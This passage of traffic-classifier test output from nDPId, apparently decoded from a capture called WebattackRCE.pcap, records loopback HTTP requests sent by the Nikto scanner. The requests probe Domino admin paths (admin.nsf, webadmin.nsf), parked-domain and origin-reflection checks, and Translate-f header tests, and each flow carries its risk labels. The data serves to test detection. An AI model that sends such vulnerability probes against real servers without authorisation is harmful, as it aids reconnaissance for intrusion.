(Test:robots)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 